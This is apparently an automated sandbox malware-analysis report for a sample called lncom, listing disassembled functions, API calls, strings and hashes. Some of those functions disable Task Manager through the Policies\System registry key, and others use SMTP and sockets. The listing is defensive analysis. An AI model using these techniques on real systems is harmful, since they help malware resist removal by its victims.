
Uniqueness Score: -1.00%

Function 00410BEC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 71COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000061,00000001,?,00000000), ref: 00410C09

Part of subcall function 00451220: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 00451297
Part of subcall function 00451220: RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 004512AB

Part of subcall function 004512FC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00451401), ref: 00451376

Strings

DisableTaskMgr, xrefs: 00410CA4
, xrefs: 00410C9E
Software\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00410C60
`&\, xrefs: 00410C8C
Software\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00410C30

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseCreateInfoOpenParametersSystem
String ID: $DisableTaskMgr$Software\Microsoft\Windows\CurrentVersion\Policies\System$Software\Microsoft\Windows\CurrentVersion\Policies\System$`&\
API String ID: 1921297971-652338890
Opcode ID: d5b0a6835e73b2697f588370c0be0027b92190b8fb45bf58123b07d9c38c619a
Instruction ID: 9b040722f1aa8fca58e0d7dcd95497f4f396578925a9693e1d36e300af72de3a
Opcode Fuzzy Hash: d5b0a6835e73b2697f588370c0be0027b92190b8fb45bf58123b07d9c38c619a
Instruction Fuzzy Hash: DF21FD3491010DDFCB00EBD1D442BDEB7B5FF8A308F10406AE90567266DB799E469B95

Uniqueness

Uniqueness Score: -1.00%

Function 00410CF0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 71COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000061,00000000,?,00000000), ref: 00410D0D

Part of subcall function 00451220: RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 00451297
Part of subcall function 00451220: RegCloseKey.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,000F003F,00000000,?,?,00000000,004512EC), ref: 004512AB

Part of subcall function 004512FC: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00451401), ref: 00451376

Strings

, xrefs: 00410DA2
NULL, xrefs: 00410D90
DisableTaskMgr, xrefs: 00410DA8
Software\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00410D34
Software\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 00410D64

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseCreateInfoOpenParametersSystem
String ID: $DisableTaskMgr$NULL$Software\Microsoft\Windows\CurrentVersion\Policies\System$Software\Microsoft\Windows\CurrentVersion\Policies\System
API String ID: 1921297971-533008659
Opcode ID: 53b66d777bde164b880e4bab564514eaf45a51ac69938b8513d65ab1a240d2a4
Instruction ID: 3ff50af229198d90a5f44cfa9e2bc53127d73bd17ab8e7c9c010625acea3ddeb
Opcode Fuzzy Hash: 53b66d777bde164b880e4bab564514eaf45a51ac69938b8513d65ab1a240d2a4
Instruction Fuzzy Hash: 89212E3491010DCFCB00EBD1D842BDEB7B5FF8A308F20406AE9056B366DB799E469B94

Uniqueness

Uniqueness Score: -1.00%

Function 004889B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00488A08
GetSystemMetrics.USER32(00000000), ref: 00488A1D
GetSystemMetrics.USER32(00000001), ref: 00488A28
lstrcpy.KERNEL32(?,DISPLAY), ref: 00488A55

Part of subcall function 00488680: GetProcAddress.KERNEL32(748F0000,00000000), ref: 00488700

Strings

GetMonitorInfoA, xrefs: 004889C8
DISPLAY, xrefs: 00488A4C

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoA
API String ID: 2545840971-1370492664
Opcode ID: 817529f7f70d920c75b9722d30c77e13eb9ca79248c2970b0cdca4edd6ba440d
Instruction ID: 3eb8a1c06707eb0759326d1c0360aa0c2cab3cad2914ca5e375f97f8ec3325d6
Opcode Fuzzy Hash: 817529f7f70d920c75b9722d30c77e13eb9ca79248c2970b0cdca4edd6ba440d
Instruction Fuzzy Hash: C711DF316013149FEB24AF619C447ABB7E8FB14710F400E2FE94AD36C0DB74A844D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00488A88 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66stringCOMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00488AE0
GetSystemMetrics.USER32(00000000), ref: 00488AF5
GetSystemMetrics.USER32(00000001), ref: 00488B00
lstrcpy.KERNEL32(?,DISPLAY), ref: 00488B2D

Part of subcall function 00488680: GetProcAddress.KERNEL32(748F0000,00000000), ref: 00488700

Strings

GetMonitorInfoW, xrefs: 00488AA0
DISPLAY, xrefs: 00488B24

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: System$Metrics$AddressInfoParametersProclstrcpy
String ID: DISPLAY$GetMonitorInfoW
API String ID: 2545840971-2774842281
Opcode ID: 21be5a34527b7e5fe464289b6eb91ad80b10ee2e0858aac0e0243fc374f88110
Instruction ID: 413c4f59560746a324ed11196588d97f973aee02f33caa30d6afa2af0f2e29bf
Opcode Fuzzy Hash: 21be5a34527b7e5fe464289b6eb91ad80b10ee2e0858aac0e0243fc374f88110
Instruction Fuzzy Hash: DB11E4716423045FDB70AF648D44BABB7E8EB64760F40092FE945D3780DA78A804D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00442878 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

@Wsocket@WSocketErrorDesc$qqri.LNCOM(500 ,00000000,00442951), ref: 004428B2
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv.LNCOM(00442994,?, (Winsock error #,?,500 ,00000000,00442951), ref: 004428FA
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState.LNCOM ref: 0044291E
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState.LNCOM(00000000,00442951), ref: 00442931

Strings

(Winsock error #, xrefs: 004428BA
500 , xrefs: 004428A6

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: SmtpSmtpprot@$State$Client@Custom$Change$qqr19Error$Desc$qqriMessage$qqrvSocketWsocket@
String ID: (Winsock error #$500
API String ID: 3242284066-3126628635
Opcode ID: d68c5985ae372c1827d469373c518bdda7c2c11c78d88596f1347be6f7a8664b
Instruction ID: 15992de8c672c99f065cc61541945d4416a506fbba511ac752591aacf5140f7a
Opcode Fuzzy Hash: d68c5985ae372c1827d469373c518bdda7c2c11c78d88596f1347be6f7a8664b
Instruction Fuzzy Hash: 85215E70A00109EFEB00DF95CA41AADBBF5FF48704FA144AAF404AB361D7B89E05DB15

Uniqueness

Uniqueness Score: -1.00%

Function 004453A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004453B1
GetTickCount.KERNEL32 ref: 00445403
@Smtpprot@TCustomSmtpClient@Abort$qqrv.LNCOM ref: 00445416

Strings

426 Timeout, xrefs: 00445421

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CountTick$Abort$qqrvClient@CustomSmtpSmtpprot@
String ID: 426 Timeout
API String ID: 3142805153-3909063433
Opcode ID: 19dc27d4d5002fa8f64b4f54671da63abc2e2724a8e783e8941a88214419fb8d
Instruction ID: 35dbc199564029c0b9b0052e4b9a68d3779712e6c525502467dbd209fe9e1307
Opcode Fuzzy Hash: 19dc27d4d5002fa8f64b4f54671da63abc2e2724a8e783e8941a88214419fb8d
Instruction Fuzzy Hash: DF211D74904584DFEB00DB98C185B9DB7F2AF00305F6541EAE4449F2A3C778AE85DB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0046C83C Relevance: 10.6, APIs: 7, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 0046C857
WindowFromPoint.USER32(?,?), ref: 0046C864
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046C872
GetCurrentThreadId.KERNEL32 ref: 0046C879
SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0046C892
SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 0046C8A9
SetCursor.USER32(00000000), ref: 0046C8BB

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
String ID:
API String ID: 1770779139-0
Opcode ID: 8b324c9f4b697c89c503f34813025907f1ba077402e10abe0ebaa506951637e2
Instruction ID: 2d9ccd8bb799ac684a72983e211cc8be8f25641c5bc4ad8bc5214fdf58fcc1bb
Opcode Fuzzy Hash: 8b324c9f4b697c89c503f34813025907f1ba077402e10abe0ebaa506951637e2
Instruction Fuzzy Hash: B201A76220434439E63137764CC6FFF229C9BC5B59F50152FBA44AB283EA6D9C0553BE

Uniqueness

Uniqueness Score: -1.00%

Function 00433308 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

@Wsocket@WSocket_WSASetLastError$qqri.LNCOM ref: 00433328

Part of subcall function 004318F4: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 00431909

@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 00433335

Part of subcall function 004360D8: @Wsocket@WSocket_WSAGetLastError$qqrv.LNCOM(00000000,004361B6), ref: 00436105
Part of subcall function 004360D8: @Wsocket@WSocketErrorDesc$qqri.LNCOM(004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436133
Part of subcall function 004360D8: @Wsocket@WSocket_closesocket$qqri.LNCOM(?,004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436163
Part of subcall function 004360D8: @Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState.LNCOM ref: 0043617A

@Wsocket@TCustomWSocket@TryToSend$qqrv.LNCOM ref: 0043337D
PostMessageA.USER32(?,00000401,?,00000000), ref: 004333B0

Strings

Send, xrefs: 0043332D

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$Socket$CustomSocket@$AnsiLastSocket_StringSystem@$ChangeDesc$qqriErrorError$qqr17Error$qqriError$qqrvMessagePostProc$qqrx17Send$qqrvSocket_closesocket$qqriStateState$qqr20
String ID: Send
API String ID: 3530378232-121738739
Opcode ID: e40fbd9461856f91d214ebd02e8fb9cf9cd4a9f84b98562bdaad90e038ad2fb8
Instruction ID: 30d06fbaaf5c2472d6213c19aeec57fad714b1f7251479dfb17bb431ea5fb492
Opcode Fuzzy Hash: e40fbd9461856f91d214ebd02e8fb9cf9cd4a9f84b98562bdaad90e038ad2fb8
Instruction Fuzzy Hash: AF212C70E04149EFDB00DF99C485AAEB7F0AF08314F2491EAE914A7391CB785F40DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00435620 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

@Wsocket@WSocket_WSASetLastError$qqri.LNCOM ref: 0043563A

Part of subcall function 004318F4: @Wsocket@WSocketGetProc$qqrx17System@AnsiString.LNCOM ref: 00431909

@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 00435647

Part of subcall function 004360D8: @Wsocket@WSocket_WSAGetLastError$qqrv.LNCOM(00000000,004361B6), ref: 00436105
Part of subcall function 004360D8: @Wsocket@WSocketErrorDesc$qqri.LNCOM(004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436133
Part of subcall function 004360D8: @Wsocket@WSocket_closesocket$qqri.LNCOM(?,004361F4,?, in function ,?,Error ,00000000,004361B6), ref: 00436163
Part of subcall function 004360D8: @Wsocket@TCustomWSocket@ChangeState$qqr20Wsocket@TSocketState.LNCOM ref: 0043617A

@Wsocket@WSocket_accept$qqrip11sockaddr_inpi.LNCOM ref: 00435671
@Wsocket@TCustomWSocket@SocketError$qqr17System@AnsiString.LNCOM ref: 0043568D

Strings

Accept, xrefs: 00435685
not a listening socket, xrefs: 0043563F

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Wsocket@$Socket$AnsiCustomSocket@StringSystem@$Error$qqr17LastSocket_$ChangeDesc$qqriErrorError$qqriError$qqrvProc$qqrx17Socket_accept$qqrip11sockaddr_inpiSocket_closesocket$qqriStateState$qqr20
String ID: Accept$not a listening socket
API String ID: 3994424495-947448358
Opcode ID: 64574ef20682582ecf0224a9964897c321ff60b69b4cf6c7ec1bd476018b4049
Instruction ID: 481ff38321b7f1d256f0151485c9ef1f2afa39818589c621472cddef04b30e4d
Opcode Fuzzy Hash: 64574ef20682582ecf0224a9964897c321ff60b69b4cf6c7ec1bd476018b4049
Instruction Fuzzy Hash: E3111270A04548DFCB10DF98C58599DB7F1AF09324F6053D6D4189B391D7349E41DF49

Uniqueness

Uniqueness Score: -1.00%

Function 00410A18 Relevance: 9.1, APIs: 6, Instructions: 128processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410A2F
Process32First.KERNEL32(000000FF,00000128), ref: 00410A62
CharLowerA.USER32(00000000), ref: 00410AB3
CharLowerA.USER32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00410AE7

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CharLower$CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 572165052-0
Opcode ID: de6a983c9488dd7870b62d2869d5d5c7e10838d9e32f6ee2431b7793902f6881
Instruction ID: 5e9ece0040f2b4a96ec7b8fc29638a36955aaa884b4f2dcf0783aa7bce623242
Opcode Fuzzy Hash: de6a983c9488dd7870b62d2869d5d5c7e10838d9e32f6ee2431b7793902f6881
Instruction Fuzzy Hash: 1051F870D1011DDBCF10EFE1C846ADDB7B8FF99309F10456BE414B2262EB7859468B68

Uniqueness

Uniqueness Score: -1.00%

Function 0049F32C Relevance: 9.1, APIs: 6, Instructions: 95filewindowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000080,000000C8,00000000,?,0049F464,?,?,00495ED3,Illegal mode in _vector_new_), ref: 0049F36B
MessageBoxA.USER32(00000000,?,00000001,00000000), ref: 0049F3B6
GetStdHandle.KERNEL32(000000F4,000000C8,00000000,?,0049F464,?,?,00495ED3,Illegal mode in _vector_new_), ref: 0049F3C2
WriteFile.KERNEL32(00000000,005D7804,00000002,?,00000000,000000F4,000000C8,00000000,?,0049F464,?,?,00495ED3,Illegal mode in _vector_new_), ref: 0049F3D7
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,00000000,005D7804,00000002,?,00000000,000000F4,000000C8,00000000,?,0049F464,?), ref: 0049F3EC
WriteFile.KERNEL32(00000000,005D7807,00000002,?,00000000,00000000,?,00000000,?,00000000,00000000,005D7804,00000002,?,00000000,000000F4), ref: 0049F3FF

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: File$Write$HandleMessageModuleName
String ID:
API String ID: 1009477876-0
Opcode ID: 60283d2cece75124e25eed9ca803a265c2322bcd9b3f21ebae49cafce7cd965a
Instruction ID: 4fc57af1693e3444c831a1776901c143edce20d411b041c34013d4450382712f
Opcode Fuzzy Hash: 60283d2cece75124e25eed9ca803a265c2322bcd9b3f21ebae49cafce7cd965a
Instruction Fuzzy Hash: FF210630544309A9EF31A3259C46FA73B5CEB24318F10827BB514E51C2EBBC994DD77A

Uniqueness

Uniqueness Score: -1.00%

Function 0045D44C Relevance: 9.1, APIs: 6, Instructions: 55windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 0045D465
SelectObject.GDI32(00000000,00000000), ref: 0045D46E
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,?,?,?,00460DF3,?,00000000,?,?,00460CCA), ref: 0045D482
SelectObject.GDI32(00000000,00000000), ref: 0045D48E
DeleteDC.GDI32(00000000), ref: 0045D494
CreatePalette.GDI32 ref: 0045D4DA

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
String ID:
API String ID: 2515223848-0
Opcode ID: 152c7ba0bd7f04ef69604492bcf408301fa4ad4efcd67e0231df5c88a655adb4
Instruction ID: be3a7dcea607a9fd4995eebf8bb294caac23e8bdb91411bb32256678785707ea
Opcode Fuzzy Hash: 152c7ba0bd7f04ef69604492bcf408301fa4ad4efcd67e0231df5c88a655adb4
Instruction Fuzzy Hash: E3019B6150431071D630B7665C43AAB71AD9FC1759F00C81FB94587252EA7CD809D36F

Uniqueness

Uniqueness Score: -1.00%

Function 0045CB30 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0045C190: CreateBrushIndirect.GDI32(00000000), ref: 0045C23A

UnrealizeObject.GDI32(00000000), ref: 0045CB3C
SelectObject.GDI32(?,00000000), ref: 0045CB4E
SetBkColor.GDI32(?,00000000), ref: 0045CB71
SetBkMode.GDI32(?,00000002), ref: 0045CB7C
SetBkColor.GDI32(?,00000000), ref: 0045CB97
SetBkMode.GDI32(?,00000001), ref: 0045CBA2

Part of subcall function 0045B4CC: GetSysColor.USER32(?), ref: 0045B4D6

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
